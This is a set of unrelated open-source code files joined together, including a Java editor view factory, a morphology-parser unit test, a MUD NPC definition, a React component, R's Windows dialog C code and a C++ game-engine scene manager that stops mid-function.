View v=src.getUI().getRootView(src);
while (v!=null && !(v instanceof CollapsibleView)) {
int i=v.getViewIndex(pos, Position.Bias.Forward);
v=v.getView(i);
}
if (v!=null) {
Shape a=getAllocation(v, src);
if (a!=null) {
Rectangle r=a instanceof Rectangle ? (Rectangle)a : a.getBounds();
r.width=CollapsibleView.AREA_SHIFT;
r.height=CollapsibleView.AREA_SHIFT;
if (r.contains(e.getPoint())) {
CollapsibleView cv=(CollapsibleView)v;
src.setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
return;
}
}
}
src.setCursor(oldCursor);
}
};
public ViewFactory getViewFactory() {
return new CollapsibleEditorKit.StyledViewFactory();
}
public void install(JEditorPane c) {
super.install(c);
c.addMouseListener(lstCollapse);
c.addMouseMotionListener(lstMoveCollapse);
}
public void deinstall(JEditorPane c) {
c.removeMouseListener(lstCollapse);
c.removeMouseMotionListener(lstMoveCollapse);
super.deinstall(c);
}
protected Shape getAllocation(View v, JEditorPane edit) {
Insets ins=edit.getInsets();
View vParent=v.getParent();
int x=ins.left;
int y=ins.top;
while(vParent!=null) {
int i=vParent.getViewIndex(v.getStartOffset(), Position.Bias.Forward);
Shape alloc=vParent.getChildAllocation(i, new Rectangle(0,0, Short.MAX_VALUE, Short.MAX_VALUE));
x+=alloc.getBounds().x;
y+=alloc.getBounds().y;
vParent=vParent.getParent();
}
if (v instanceof BoxView) {
int ind=v.getParent().getViewIndex(v.getStartOffset(), Position.Bias.Forward);
Rectangle r2=v.getParent().getChildAllocation(ind, new Rectangle(0,0,Integer.MAX_VALUE,Integer.MAX_VALUE)).getBounds();
return new Rectangle(x,y, r2.width, r2.height);
}
return new Rectangle(x,y, (int)v.getPreferredSpan(View.X_AXIS), (int)v.getPreferredSpan(View.Y_AXIS));
}
class StyledViewFactory implements ViewFactory {
public View create(Element elem) {
String kind = elem.getName();
if (kind != null) {
if (kind.equals(AbstractDocument.ContentElementName)) {
return new LabelView(elem);
}
else if (kind.equals(AbstractDocument.ParagraphElementName)) {
return new ParagraphView(elem);
}
else if (kind.equals(AbstractDocument.SectionElementName)) {
return new BoxView(elem, View.Y_AXIS);
}
else if (kind.equals(StyleConstants.ComponentElementName)) {
return new ComponentView(elem);
}
else if (kind.equals(StyleConstants.IconElementName)) {
return new IconView(elem);
}
else if (kind.equals(ehsConstants.COLLAPSIBLE_AREA_ELEMENT)) {
return new CollapsibleView(elem);
}
}
// default to text display
return new LabelView(elem);
}
}
}
|
aliok/trnltk-java
|
web/src/test/java/org/trnltk/web/training/TrainingSetCreatorParserSelectionTest.java
|
/*
* Copyright 2013 <NAME> (<EMAIL>)
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.trnltk.web.training;
import com.google.common.base.Charsets;
import com.google.common.collect.HashMultimap;
import com.google.common.collect.Ordering;
import com.google.common.io.Files;
import com.google.common.io.Resources;
import com.google.common.primitives.Ints;
import org.apache.commons.lang3.tuple.Pair;
import org.junit.Ignore;
import org.junit.Test;
import org.trnltk.model.lexicon.Root;
import org.trnltk.model.morpheme.MorphemeContainer;
import org.trnltk.morphology.contextless.parser.MorphologicParser;
import org.trnltk.morphology.contextless.parser.PredefinedPaths;
import org.trnltk.morphology.contextless.parser.SuffixApplier;
import org.trnltk.morphology.contextless.parser.ContextlessMorphologicParser;
import org.trnltk.morphology.contextless.parser.PhoneticAttributeSets;
import org.trnltk.morphology.contextless.parser.SuffixFormGraph;
import org.trnltk.morphology.contextless.parser.SuffixFormGraphExtractor;
import org.trnltk.morphology.contextless.rootfinder.*;
import org.trnltk.morphology.lexicon.RootMapFactory;
import org.trnltk.morphology.morphotactics.*;
import org.trnltk.morphology.phonetics.PhoneticsAnalyzer;
import org.trnltk.morphology.phonetics.PhoneticsEngine;
import org.trnltk.util.MorphemeContainerFormatter;
import java.io.File;
import java.io.IOException;
import java.util.*;
import static org.junit.Assert.fail;
public class TrainingSetCreatorParserSelectionTest {
static final Ordering<String> byLengthOrdering = new Ordering<String>() {
public int compare(String left, String right) {
return Ints.compare(left.length(), right.length());
}
};
@SuppressWarnings("unchecked")
static final Ordering<String> parseResultOrdering = Ordering.compound(Arrays.asList(byLengthOrdering, Ordering.<String>natural()));
@Test
@Ignore
public void shouldMatchExpectations() throws IOException {
boolean hasError = false;
final List<Pair<String, List<String>>> entries = getEntries();
final MorphologicParser morphologicParser = createParser();
for (Pair<String, List<String>> entry : entries) {
final String surface = entry.getLeft();
final List<String> expectedParseResult = entry.getRight();
final List<MorphemeContainer> morphemeContainers = morphologicParser.parseStr(surface);
final List<String> retrieved = new ArrayList<String>(MorphemeContainerFormatter.formatMorphemeContainers(morphemeContainers));
Collections.sort(retrieved, parseResultOrdering);
if (!expectedParseResult.equals(retrieved)) {
System.out.println("W " + surface);
System.out.println("Expected");
for (String s : expectedParseResult) {
System.out.println("- " + s);
}
System.out.println("Retrieved");
for (String s : retrieved) {
System.out.println("- " + s);
}
hasError = true;
}
}
if (hasError)
fail();
}
private void validateEntries(List<Pair<String, List<String>>> entries) {
for (Pair<String, List<String>> entry : entries) {
final List<String> parseResults = entry.getRight();
final boolean ordered = parseResultOrdering.isOrdered(parseResults);
if (!ordered) {
throw new RuntimeException("Parse results are not sorted! " + entry.getLeft());
}
}
}
private List<Pair<String, List<String>>> getEntries() throws IOException {
final File expectationFile = new File(Resources.getResource("trainingSetParserExpectation.txt").getFile());
final List<String> lines = Files.readLines(expectationFile, Charsets.UTF_8);
final List<Pair<String, List<String>>> entries = new LinkedList<Pair<String, List<String>>>();
String currentSurface = null;
List<String> currentExpectedParseResults = new LinkedList<String>();
for (int i = 0; i < lines.size(); i++) {
String line = lines.get(i);
if (line.startsWith("W ")) {
if (currentSurface != null) {
entries.add(Pair.of(currentSurface, currentExpectedParseResults));
}
currentSurface = line.substring(2);
currentExpectedParseResults = new LinkedList<String>();
} else if (line.startsWith("- ")) {
currentExpectedParseResults.add(line.substring(2));
} else {
throw new RuntimeException("Illegal line : " + i);
}
}
if (currentSurface != null) {
entries.add(Pair.of(currentSurface, currentExpectedParseResults));
}
validateEntries(entries);
return entries;
}
private MorphologicParser createParser() {
// load bundled dictionaries of numbers and words
HashMultimap<String, ? extends Root> dictionaryRootMap = RootMapFactory.createSimpleWithNumbers();
// build common parts
final PhoneticsAnalyzer phoneticsAnalyzer = new PhoneticsAnalyzer();
final PhoneticAttributeSets phoneticAttributeSets = new PhoneticAttributeSets();
final SuffixFormSequenceApplier suffixFormSequenceApplier = new SuffixFormSequenceApplier();
final PhoneticsEngine phoneticsEngine = new PhoneticsEngine(suffixFormSequenceApplier);
final SuffixApplier suffixApplier = new SuffixApplier(phoneticsEngine);
// build extractor which is used while converting a suffix graph to a suffix form graph
final SuffixFormGraphExtractor suffixFormGraphExtractor = new SuffixFormGraphExtractor(suffixFormSequenceApplier, phoneticsAnalyzer, phoneticAttributeSets);
// build suffix graphs
final SuffixGraph suffixGraph = new CopulaSuffixGraph(new ProperNounSuffixGraph(new NumeralSuffixGraph(new BasicSuffixGraph())));
suffixGraph.initialize();
// build predefined paths with suffix graphs and dictionary
final PredefinedPaths predefinedPaths = new PredefinedPaths(suffixGraph, dictionaryRootMap, suffixApplier);
predefinedPaths.initialize();
// build root finders and add them into the chain
final DictionaryRootFinder dictionaryRootFinder = new DictionaryRootFinder(dictionaryRootMap);
final RangeDigitsRootFinder rangeDigitsRootFinder = new RangeDigitsRootFinder();
final OrdinalDigitsRootFinder ordinalDigitsRootFinder = new OrdinalDigitsRootFinder();
final CardinalDigitsRootFinder cardinalDigitsRootFinder = new CardinalDigitsRootFinder();
final ProperNounFromApostropheRootFinder properNounFromApostropheRootFinder = new ProperNounFromApostropheRootFinder();
final ProperNounWithoutApostropheRootFinder properNounWithoutApostropheRootFinder = new ProperNounWithoutApostropheRootFinder();
final PuncRootFinder puncRootFinder = new PuncRootFinder();
final RootFinderChain rootFinderChain = new RootFinderChain(new RootValidator());
rootFinderChain
.offer(puncRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
.offer(rangeDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
.offer(ordinalDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
.offer(cardinalDigitsRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
.offer(properNounFromApostropheRootFinder, RootFinderChain.RootFinderPolicy.STOP_CHAIN_WHEN_INPUT_IS_HANDLED)
.offer(properNounWithoutApostropheRootFinder, RootFinderChain.RootFinderPolicy.CONTINUE_ON_CHAIN)
.offer(dictionaryRootFinder, RootFinderChain.RootFinderPolicy.CONTINUE_ON_CHAIN);
// extract suffix form graph from suffix graph
final SuffixFormGraph suffixFormGraph = suffixFormGraphExtractor.extract(suffixGraph);
// finally, build parser
final ContextlessMorphologicParser parser = new ContextlessMorphologicParser(suffixFormGraph, predefinedPaths, rootFinderChain, suffixApplier);
return parser;
}
}
|
cantona/NT6
|
nitan/d/tangmen/npc/boy.c
|
<reponame>cantona/NT6<filename>nitan/d/tangmen/npc/boy.c
//boy.c
inherit NPC;
void create()
{
int i,amun;
string *order = ({"張", "王", "李", "趙", "孫", "徐", "鄭", "周", "吳",
"蔣", "沈", "楊", "苗", "尹", "金", "魏", "陶", "俞", "柳", "朱"});
string *orderr = ({"包包", "寶寶", "乖乖", "小小", "磊磊",
"雞雞", "鴉鴉", "狗狗", "貓貓"});
set_name( order[random(20)] + orderr[random(8)], ({ "boy", "kid" }) );
set("title", "無知男孩");
set("gender", "男性" );
set("age", random(5)+4);
set("long",
"他很小, 很好欺服.\n");
set("chat_chance", 15);
set("chat_msg", ({
(: random_move :)
}) );
set("attitude", "peaceful");
set("combat_exp", random(1000));
set("max_qi", 100);
set("qi", 100);
set("max_jingli", 100);
set("jingli", 100);
set_skill("cuff", 1+random(10));
setup();
carry_object("clone/misc/cloth")->wear();
}
|
jpratt-mru/new.maco.calendar
|
src/components/RoomDoubleBookingIssue.js
|
<filename>src/components/RoomDoubleBookingIssue.js
import React from "react";
import styled from "styled-components";
const Issue = styled.div`
padding: 10px;
`;
const RoomDoubleBookingIssue = props => {
return (
<Issue className="alert alert-primary">
<p className="mb-0">
<span className="font-weight-bold">
{props.issue.room.toUpperCase()}
</span>{" "}
is double-booked with these classes:
<br />
<span className="font-weight-bold">
{props.issue.classes
.sort()
.join()
.toUpperCase()}
</span>
</p>
<p className="mb-0">
<a href={props.csvFileName} rel="noopener noreferrer" target="_blank">
csv
</a>{" "}
lines {props.issue.eventIds.sort((a, b) => a - b).join()}
</p>
</Issue>
);
};
export default RoomDoubleBookingIssue;
|
JoannaCode/LeetCode-Sol-Res
|
Medium/BestTimeStock2.java
|
<filename>Medium/BestTimeStock2.java
/**
* Say you have an array for which the ith element is the price of a given
* stock on day i.
*
* Design an algorithm to find the maximum profit. You may complete
* <strong>as many transactions as you like</strong> (ie, buy one and sell
* one share of the stock multiple times). However, you may not engage in
* multiple transactions at the same time (ie, you must sell the stock
* before you buy again).
*
* Tags: Array, Greedy
*/
class BestTimeStock2 {
public static void main(String[] args) {
int[] prices = { 1, 2, 10, 100 };
System.out.println(maxProfit(prices));
}
/**
* Sell whenever there is profit.
* If next value is bigger, add the difference up to the profit
*/
public static int maxProfit(int[] prices) {
int max = 0;
for (int i = 0; i < prices.length - 1; i++)
if (prices[i + 1] > prices[i]) max += prices[i + 1] - prices[i];
return max;
}
}
|
pedrol3001/Compiler
|
Src/TabelaDeSimbolos/Jump/Jump.cpp
|
#include "Jump.h"
#include <cassert>
void LabelVal::setLinha(long long int _linha) {
linha=_linha;
}
long long int LabelVal::getLinha() {
assert(linha>=0);
return linha;
}
LabelVal::LabelVal(): Atributo("LabelVal") {}
|
upowerman/spring-boot-learning
|
spring-boot-web/src/main/java/com/yunus/base/IntToGenderConverter.java
|
package com.yunus.base;
import com.yunus.constant.Gender;
import org.springframework.core.convert.converter.Converter;
public class IntToGenderConverter implements Converter<String, Gender> {
@Override
public Gender convert(String source) {
return Gender.getByValue(Integer.parseInt(source));
}
}
|
ronkok/Temml
|
src/functions/hbox.js
|
<gh_stars>1-10
import defineFunction, { ordargument } from "../defineFunction";
import { StyleLevel } from "../constants"
import mathMLTree from "../mathMLTree";
import * as mml from "../buildMathML";
// \hbox is provided for compatibility with LaTeX \vcenter.
// In LaTeX, \vcenter can act only on a box, as in
// \vcenter{\hbox{$\frac{a+b}{\dfrac{c}{d}}$}}
// This function by itself doesn't do anything but prevent a soft line break.
defineFunction({
type: "hbox",
names: ["\\hbox"],
props: {
numArgs: 1,
argTypes: ["hbox"],
allowedInArgument: true,
allowedInText: false
},
handler({ parser }, args) {
return {
type: "hbox",
mode: parser.mode,
body: ordargument(args[0])
};
},
mathmlBuilder(group, style) {
const newOptions = style.withLevel(StyleLevel.TEXT)
return new mathMLTree.MathNode("mrow", mml.buildExpression(group.body, newOptions));
}
});
|
ShawonBarman/URI-Online-judge-Ad-Hoc-level-problem-solution-in-python
|
2116.py
|
<reponame>ShawonBarman/URI-Online-judge-Ad-Hoc-level-problem-solution-in-python<gh_stars>1-10
arr = []
for i in range(2,1001):
flag = 0
for j in range(2,i):
if i % j == 0:
flag = 1
break
if flag == 0:
arr.append(i)
# print(arr)
n, m = map(int, input().split())
p1 = 0
p2 = 0
for x in arr:
if n >= x:
p1 = x
if m >= x:
p2 = x
# print(p1, p2)
print(p1 * p2)
|
blockspacer/chromium_base_conan
|
extensions/gen/mojo/public/cpp/bindings/tests/idle_tracking_unittest.test-mojom-shared-message-ids.h
|
// mojo/public/cpp/bindings/tests/idle_tracking_unittest.test-mojom-shared-message-ids.h is auto generated by mojom_bindings_generator.py, do not edit
// Copyright 2018 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
#define MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
#include <stdint.h>
namespace mojo {
namespace test {
namespace idle_tracking_unittest {
namespace mojom {
namespace internal {
// The 1611864242 value is based on sha256(salt + "TestService1").
constexpr uint32_t kTestService_Ping_Name = 1611864242;
// The 1206904002 value is based on sha256(salt + "TestService2").
constexpr uint32_t kTestService_PingPong_Name = 1206904002;
// The 1220089824 value is based on sha256(salt + "TestService3").
constexpr uint32_t kTestService_BindKeepAlive_Name = 1220089824;
} // namespace internal
} // namespace mojom
} // namespace idle_tracking_unittest
} // namespace test
} // namespace mojo
#endif // MOJO_PUBLIC_CPP_BINDINGS_TESTS_IDLE_TRACKING_UNITTEST_TEST_MOJOM_SHARED_MESSAGE_IDS_H_
|
lifebit-ai/exomedepth
|
bin/R-3.5.1/src/library/utils/src/windows/dialogs.c
|
<filename>bin/R-3.5.1/src/library/utils/src/windows/dialogs.c<gh_stars>1-10
/*
* R : A Computer Language for Statistical Data Analysis
* file dialogs.c
* Copyright (C) 1998--2003 <NAME> and <NAME>
* Copyright (C) 2004 The R Foundation
* Copyright (C) 2005--2017 The R Core Team
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, a copy is available at
* https://www.R-project.org/Licenses/
*/
#ifdef HAVE_CONFIG_H
#include <config.h>
#endif
#include <Defn.h>
#include "graphapp/ga.h"
#include <windows.h>
#undef ERROR
#include <R_ext/RS.h> /* for Calloc */
#include "win-nls.h"
#include "rui.h"
#include "Startup.h"
typedef struct {
window wprog;
progressbar pb;
label lab;
int width;
double min, max, val;
} winprogressbar;
static void pbarFinalizer(SEXP ptr)
{
winprogressbar *pbar;
if(TYPEOF(ptr) != EXTPTRSXP) return;
pbar = R_ExternalPtrAddr(ptr);
if(!pbar) return;
hide(pbar->wprog);
if(pbar-> lab) del(pbar->lab);
del(pbar->pb);
del(pbar->wprog);
Free(pbar);
R_ClearExternalPtr(ptr); /* not really needed */
}
/* winProgressBar(width, title, label, min, max, initial) */
SEXP winProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP tmp, ptr;
int width, iv;
double d;
const char *title, *label;
winprogressbar *pbar;
Rboolean haveLabel;
args = CDR(args);
pbar = Calloc(1, winprogressbar);
width = asInteger(CAR(args)); args = CDR(args);
if(width == NA_INTEGER || width < 0) width = 200;
tmp = CAR(args); args = CDR(args);
if(!isString(tmp) || length(tmp) < 1 || STRING_ELT(tmp, 0) == NA_STRING)
errorcall(call, "invalid '%s' argument", "title");
title = translateChar(STRING_ELT(tmp, 0));
tmp = CAR(args); args = CDR(args);
if(!isString(tmp) || length(tmp) < 1 || STRING_ELT(tmp, 0) == NA_STRING)
errorcall(call, "invalid '%s' argument", "Label");
label = translateChar(STRING_ELT(tmp, 0));
haveLabel = strlen(label) > 0;
d = asReal(CAR(args)); args = CDR(args);
if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "min");
pbar->min = d;
d = asReal(CAR(args)); args = CDR(args);
if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "max");
pbar->max = d;
d = asReal(CAR(args)); args = CDR(args);
if (!R_FINITE(d)) errorcall(call, "invalid '%s' argument", "initial");
pbar->val = d;
pbar->width = width;
pbar->wprog = newwindow(title, rect(0, 0, width+40, haveLabel ? 100: 80),
Titlebar | Centered);
setbackground(pbar->wprog, dialog_bg());
if(haveLabel)
pbar->lab = newlabel(label, rect(10, 15, width+20, 25), AlignCenter);
pbar->pb = newprogressbar(rect(20, haveLabel ? 50 : 30, width, 20),
0, width, 1, 1);
iv = pbar->width * (pbar->val - pbar->min)/(pbar->max - pbar->min);
setprogressbar(pbar->pb, iv);
show(pbar->wprog);
ptr = R_MakeExternalPtr(pbar, install("winProgressBar"), R_NilValue);
R_RegisterCFinalizerEx(ptr, pbarFinalizer, TRUE);
return ptr;
}
SEXP closeWinProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
pbarFinalizer(CADR(args));
return R_NilValue;
}
SEXP setWinProgressBar(SEXP call, SEXP op, SEXP args, SEXP env)
{
args = CDR(args);
SEXP ptr = CAR(args);
winprogressbar *pbar;
double value;
pbar = R_ExternalPtrAddr(ptr);
if(!pbar)
error("invalid progressbar -- has it been closed?");
value = pbar->val;
if(!isNull(CADR(args))) {
int iv;
double val = asReal(CADR(args));
SEXP title = CADDR(args), label = CADDDR(args);
if (R_FINITE(val) && val >= pbar->min && val <= pbar->max) {
iv = pbar->width * (val - pbar->min)/(pbar->max - pbar->min);
setprogressbar(pbar->pb, iv);
pbar->val = val;
}
if (!isNull(title)) {
SEXP ctxt;
if(!isString(title) || length(title) < 1)
errorcall(call, "invalid '%s' argument", "title");
ctxt = STRING_ELT(title, 0);
if (ctxt != NA_STRING)
settext(pbar->wprog, translateChar(ctxt));
}
if(pbar->lab && !isNull(label)) {
SEXP clab;
if(!isString(label) || length(label) < 1)
errorcall(call, "invalid '%s' argument", "label");
clab = STRING_ELT(label, 0);
if (clab != NA_STRING)
settext(pbar->lab, translateChar(clab));
}
}
return ScalarReal(value);
}
SEXP winDialog(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP message;
const char * type;
int res=YES;
args = CDR(args);
type = translateChar(STRING_ELT(CAR(args), 0));
message = CADR(args);
if(!isString(message) || length(message) != 1 ||
strlen(translateChar(STRING_ELT(message, 0))) > 999)
error(_("invalid '%s' argument"), "message");
if (strcmp(type, "ok") == 0) {
askok(translateChar(STRING_ELT(message, 0)));
res = 10;
} else if (strcmp(type, "okcancel") == 0) {
res = askokcancel(translateChar(STRING_ELT(message, 0)));
if(res == YES) res = 2;
} else if (strcmp(type, "yesno") == 0) {
res = askyesno(translateChar(STRING_ELT(message, 0)));
} else if (strcmp(type, "yesnocancel") == 0) {
res = askyesnocancel(translateChar(STRING_ELT(message, 0)));
} else
errorcall(call, _("unknown type"));
return ScalarInteger(res);
}
SEXP winDialogString(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP message, def;
const char *string;
args = CDR(args);
message = CAR(args);
if(!isString(message) || length(message) != 1 ||
strlen(translateChar(STRING_ELT(message, 0))) > 255)
error(_("invalid '%s' argument"), "message");
def = CADR(args);
if(!isString(def) || length(def) != 1)
error(_("invalid '%s' argument"), "default");
string = askstring(translateChar(STRING_ELT(message, 0)),
translateChar(STRING_ELT(def, 0)));
if (string) return mkString(string);
else return R_NilValue;
}
static char msgbuf[256];
SEXP winMenuNames(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP menuNames;
int i, nmenus;
args = CDR(args);
if (CharacterMode != RGui)
errorcall(call, _("menu functions can only be used in the GUI"));
nmenus = numwinmenus();
PROTECT(menuNames = allocVector(STRSXP, nmenus));
for (i = 0; i < nmenus; i++) {
SET_STRING_ELT(menuNames, i, mkChar(getusermenuname(i)));
}
UNPROTECT(1);
return(menuNames);
}
SEXP winMenuItems(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP mname, ans, ansnames;
menuItems *items;
char errmsg[50];
int i;
args = CDR(args);
if (CharacterMode != RGui)
errorcall(call, _("menu functions can only be used in the GUI"));
mname = CAR(args);
if (!isString(mname) || length(mname) != 1)
error(_("invalid '%s' argument"), "menuname");
items = wingetmenuitems(translateChar(STRING_ELT(mname,0)), errmsg);
if (items->numItems == 0) {
snprintf(msgbuf, 256, _("unable to retrieve items for %s (%s)"),
translateChar(STRING_ELT(mname,0)), errmsg);
freemenuitems(items);
errorcall(call, msgbuf);
}
PROTECT(ans = allocVector(STRSXP, items->numItems));
PROTECT(ansnames = allocVector(STRSXP, items->numItems));
for (i = 0; i < items->numItems; i++) {
SET_STRING_ELT(ans, i, mkChar(items->mItems[i]->action));
SET_STRING_ELT(ansnames, i, mkChar(items->mItems[i]->name));
}
setAttrib(ans, R_NamesSymbol, ansnames);
freemenuitems(items);
UNPROTECT(2);
return(ans);
}
SEXP winMenuAdd(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP smenu, sitem;
int res;
char errmsg[50];
args = CDR(args);
if (CharacterMode != RGui)
errorcall(call, _("menu functions can only be used in the GUI"));
smenu = CAR(args);
if(!isString(smenu) || length(smenu) != 1)
error(_("invalid '%s' argument"), "menuname");
sitem = CADR(args);
if (isNull(sitem)) { /* add a menu */
res = winaddmenu (translateChar(STRING_ELT(smenu, 0)), errmsg);
if (res > 0) {
snprintf(msgbuf, 256, _("unable to add menu (%s)"), errmsg);
errorcall(call, msgbuf);
}
} else { /* add an item */
if(!isString(sitem) || length(sitem) != 1)
error(_("invalid '%s' argument"), "itemname");
res = winaddmenuitem (translateChar(STRING_ELT(sitem, 0)),
translateChar(STRING_ELT(smenu, 0)),
translateChar(STRING_ELT(CADDR(args), 0)),
errmsg);
if (res > 0) {
snprintf(msgbuf, 256, _("unable to add menu item (%s)"), errmsg);
errorcall(call, msgbuf);
}
}
return (R_NilValue);
}
SEXP winMenuDel(SEXP call, SEXP op, SEXP args, SEXP env)
{
SEXP smenu, sitem;
int res;
char errmsg[50];
args = CDR(args);
if (CharacterMode != RGui)
errorcall(call, _("menu functions can only be used in the GUI"));
smenu = CAR(args);
if(!isString(smenu) || length(smenu) != 1)
error(_("invalid '%s' argument"), "menuname");
sitem = CADR(args);
if (isNull(sitem)) { /* delete a menu */
res = windelmenu (translateChar(STRING_ELT(smenu, 0)), errmsg);
if (res > 0)
errorcall(call, _("menu does not exist"));
} else { /* delete an item */
if(!isString(sitem) || length(sitem) != 1)
error(_("invalid '%s' argument"), "itemname");
res = windelmenuitem (translateChar(STRING_ELT(sitem, 0)),
translateChar(STRING_ELT(smenu, 0)), errmsg);
if (res > 0) {
snprintf(msgbuf, 256, _("unable to delete menu item (%s)"), errmsg);
errorcall(call, msgbuf);
}
}
return (R_NilValue);
}
|
naboxwallet/nabox
|
nabox-common/src/main/java/io/nabox/common/config/RedisConfig.java
|
<reponame>naboxwallet/nabox<gh_stars>10-100
/**
* Copyright (c) 2016-2019 Nabox开源 All rights reserved.
*
* https://www.renren.io
*
* 版权所有,侵权必究!
*/
package io.nabox.common.config;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.data.redis.connection.RedisConnectionFactory;
import org.springframework.data.redis.core.RedisTemplate;
import org.springframework.data.redis.serializer.JdkSerializationRedisSerializer;
import org.springframework.data.redis.serializer.StringRedisSerializer;
/**
* Redis配置
*
* @author Mark <EMAIL>
*/
@Configuration
public class RedisConfig {
@Bean
public RedisTemplate<String, Object> redisTemplate(RedisConnectionFactory redisConnectionFactory) {
RedisTemplate<String, Object> redisTemplate = new RedisTemplate<>();
redisTemplate.setKeySerializer(new StringRedisSerializer());
redisTemplate.setHashKeySerializer(new StringRedisSerializer());
redisTemplate.setHashValueSerializer(new StringRedisSerializer());
redisTemplate.setValueSerializer(new JdkSerializationRedisSerializer());
redisTemplate.setConnectionFactory(redisConnectionFactory);
return redisTemplate;
}
}
|
markitus18/Thor-Engine
|
ThorEngine/Source Code/M_SceneManager.cpp
|
#include "M_SceneManager.h"
#include "Engine.h"
#include "Globals.h"
#include "Intersections.h"
#include "Config.h"
#include "Quadtree.h"
#include "Time.h"
#include "M_Camera3D.h"
#include "M_Input.h"
#include "I_Scenes.h"
#include "M_Editor.h"
#include "M_Renderer3D.h"
#include "M_FileSystem.h"
#include "M_Resources.h"
#include "GameObject.h"
#include "R_Scene.h"
#include "R_Model.h"
#include "R_Mesh.h"
#include "C_Mesh.h"
#include "C_Transform.h"
#include "C_Camera.h"
#include <windows.h>
#include <shobjidl.h>
M_SceneManager::M_SceneManager(bool start_enabled) : Module("Scene", start_enabled)
{
}
M_SceneManager::~M_SceneManager()
{
}
bool M_SceneManager::Init(Config& config)
{
quadtree = new Quadtree(AABB(vec(-80, -30, -80), vec(80, 30, 80)));
return true;
}
// Load assets
bool M_SceneManager::Start()
{
LOG("Loading Intro assets");
bool ret = true;
return ret;
}
// Load assets
bool M_SceneManager::CleanUp()
{
LOG("Unloading scene");
return true;
}
GameObject* M_SceneManager::GetRoot()
{
return hCurrentScene.Get()->root;
}
const GameObject* M_SceneManager::GetRoot() const
{
return hCurrentScene.Get()->root;
}
// Update
update_status M_SceneManager::Update()
{
#pragma region WindowTest
if (Engine->input->GetKey(SDL_SCANCODE_K) == KEY_DOWN)
{
HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED |
COINIT_DISABLE_OLE1DDE);
if (SUCCEEDED(hr))
{
IFileOpenDialog *pFileOpen;
// Create the FileOpenDialog object.
hr = CoCreateInstance(CLSID_FileOpenDialog, NULL, CLSCTX_ALL,
IID_IFileOpenDialog, reinterpret_cast<void**>(&pFileOpen));
if (SUCCEEDED(hr))
{
// Show the Open dialog box.
hr = pFileOpen->Show(NULL);
}
}
}
#pragma endregion
UpdateAllGameObjects(GetRoot(), Time::deltaTime);
if (Engine->renderer3D->culling_camera)
{
std::vector<const GameObject*> candidates;
quadtree->CollectCandidates(candidates, Engine->renderer3D->culling_camera->frustum);
std::vector<const GameObject*> gameObjects;
TestGameObjectsCulling(candidates, gameObjects);
TestGameObjectsCulling(nonStatic, gameObjects);
for (uint i = 0; i < gameObjects.size(); i++)
{
if (gameObjects[i]->name != "root");
((GameObject*)gameObjects[i])->Draw(true, false, drawBounds, drawBoundsSelected);
}
gameObjects.clear();
}
else
{
DrawAllGameObjects(GetRoot());
}
if (drawQuadtree)
quadtree->Draw();
return UPDATE_CONTINUE;
}
update_status M_SceneManager::PostUpdate()
{
DeleteToRemoveGameObjects();
return UPDATE_CONTINUE;
}
std::string M_SceneManager::GetNewGameObjectName(const char* name, const GameObject* parent) const
{
uint count = GetGameObjectNameCount(name, parent);
std::string newName = name;
if (count > 0)
newName.append(" (").append(std::to_string(count)).append(")");
return newName;
}
int M_SceneManager::GetGameObjectNameCount(const char* name, const GameObject* parent) const
{
if (parent == nullptr) parent = GetRoot();
if (parent->childs.size() == 0) return 0;
std::vector<GameObject*>::iterator it;
uint count = 0;
bool found = false;
do
{
std::string nameStr = name;
if (count > 0)
{
nameStr.append(" (").append(std::to_string(count)).append(")");
}
if (found = parent->FindChildByName(nameStr.c_str()))
{
++count;
}
} while (found == true);
return count;
}
void M_SceneManager::SaveConfig(Config& config) const
{
}
void M_SceneManager::SetStaticGameObject(GameObject* gameObject, bool isStatic, bool allChilds)
{
if (gameObject->isStatic != isStatic)
{
gameObject->SetStatic(isStatic);
if (isStatic == true)
{
GameObject* it = gameObject->parent;
while (it != nullptr && it->name != "root")
{
SetStaticGameObject(it, isStatic, false);
it = it->parent;
}
quadtree->AddGameObject(gameObject);
for (std::vector<const GameObject*>::iterator it = nonStatic.begin(); it != nonStatic.end(); it++)
{
if ((*it) == gameObject)
{
nonStatic.erase(it);
break;
}
}
}
else
{
quadtree->RemoveGameObject(gameObject);
nonStatic.push_back(gameObject);
}
}
if (allChilds)
{
